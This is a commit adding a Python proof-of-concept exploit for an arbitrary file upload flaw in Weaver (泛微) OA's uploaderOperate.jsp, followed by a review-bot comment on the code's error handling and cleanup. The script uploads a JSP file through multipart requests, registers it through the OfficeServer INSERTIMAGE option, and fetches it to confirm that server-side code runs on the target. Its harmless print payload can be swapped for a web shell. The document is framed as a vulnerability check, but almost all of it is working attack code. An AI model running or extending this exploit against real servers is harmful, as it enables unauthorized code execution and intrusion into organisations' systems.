
Commit aa8e1f6

authored
Create weaver-uploadoperation-file-upload.py
1 parent ae3a30f commit aa8e1f6


1 file changed

+107
-0
lines changed


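--- a/weaver-uploadoperation-file-upload.py
+++ b/weaver-uploadoperation-file-upload.py
@@ -0,0 +1,107 @@
+#!/usr/bin/env python3
+#-*- coding: utf-8 -*-
+#author: myh0st@xazlsec
+
+import requests
+import random
+import string
+import sys
+import base64
+
+
+def generate_random_string(length=5):
+"""生成随机字符串"""
+return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
+
+def verify(target_url):
+"""
+检测泛微 OA workrelate/plan/util/uploaderOperate.jsp 接口的任意文件上传漏洞
+:param target_url: 目标 URL(例如:http://example.com)
+"""
+try:
+# 生成随机文件名和字符串
+filename = generate_random_string()
+random_string = generate_random_string(10)
+
+# 构造请求 URL 和文件路径
+upload_url = f"{target_url}/workrelate/plan/util/uploaderOperate.jsp"
+file_url = f"{target_url}/{filename}.jsp"
+
+# 请求头
+headers = {
+"Host": target_url.split("//")[1].split("/")[0],
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36",
+"Accept": "*/*",
+"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj",
+"Accept-Encoding": "gzip",
+}
+
+# 请求体
+body = (
+"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
+'Content-Disposition: form-data; name="secId"\r\n\r\n'
+"1\r\n"
+"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
+f'Content-Disposition: form-data; name="Filedata"; filename="{filename}.jsp"\r\n\r\n'
+f"<%out.println('{random_string}');%>\r\n"
+"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
+'Content-Disposition: form-data; name="plandetailid"\r\n\r\n'
+"1\r\n"
+"------WebKitFormBoundaryVdb2RRl25PuaGhWj--\r\n"
+)
+
+# 发送 POST 请求上传文件
+print(f"[*] Uploading file to: {upload_url}")
+response_upload = requests.post(upload_url, headers=headers, data=body, timeout=10)
+print(f"[*] Upload response status code: {response_upload.status_code}")
+
+# 提取 fileid
+fileid = None
+if response_upload.status_code == 200 and "workrelate/plan/util/ViewDoc" in response_upload.text:
+print("[+] File uploaded successfully.")
+# 假设 fileid 在响应中可以通过正则提取
+import re
+match = re.search(r"&fileid=(.*?)'>", response_upload.text)
+if match:
+fileid = match.group(1)
+print(f"[+] Extracted fileid: {fileid}")
+else:
+print("[-] Failed to extract fileid.")
+else:
+print("[-] File upload failed.")
+return
+
+# 发送 POST 请求插入图片
+insert_url = f"{target_url}/OfficeServer"
+insert_body = (
+"------WebKitFormBoundaryVdb2RRl25PuaGhWj\r\n"
+'Content-Disposition: form-data; name="aaa"\r\n\r\n'
+f'{{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{fileid}"}}\r\n'
+"------WebKitFormBoundaryVdb2RRl25PuaGhWj--\r\n"
+)
+print(f"[*] Inserting image with fileid: {fileid}")
+response_insert = requests.post(insert_url, headers=headers, data=insert_body, timeout=10)
+print(f"[*] Insert response status code: {response_insert.status_code}")
+
+# 发送 GET 请求访问上传的文件
+print(f"[*] Accessing file at: {file_url}")
+response_file = requests.get(file_url, headers=headers, timeout=10)
+print(f"[*] File access response status code: {response_file.status_code}")
+
+# 检查漏洞是否存在
+if response_file.status_code == 200 and random_string in response_file.text:
+print("[+] Vulnerability detected! File uploaded and accessed successfully.")
+return file_url
+else:
+print("[-] No vulnerability detected.")
+
+except requests.exceptions.RequestException as e:
+print(f"[-] Error: {e}")
+return False
+if __name__=="__main__":
+target = sys.argv[1]
+data = verify(target)
+if data:
+print("[+]漏洞存在,上传后的图片路径为:", data)
+else:
+print("[-]漏洞不存在")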
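Review bot: In `verify`, when the `&fileid=` regex does not match the upload response, `fileid` stays `None`, yet the function (as far as the nesting can be read from this flattened rendering) still posts to `/OfficeServer` with the literal text `None` and then fetches the file, so a parse failure costs two more requests against the target and ends in a misleading "No vulnerability detected"; the `else` after `print("[-] Failed to extract fileid.")` should `return False`. The negative paths are also inconsistent (a bare `return`, an implicit `None` after the final `else`, and `False` in the handler), so using `return False` on all of them would give callers one contract. `target_url.split("//")[1]` raises `IndexError` for a URL without a scheme, which `except requests.exceptions.RequestException` does not catch; the hand-built `Host` header can be dropped, since `requests` derives it from the URL. A positive run leaves the uploaded `.jsp` on the tested server, and the docstring should say so, so that the path printed at the end is kept for cleanup.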
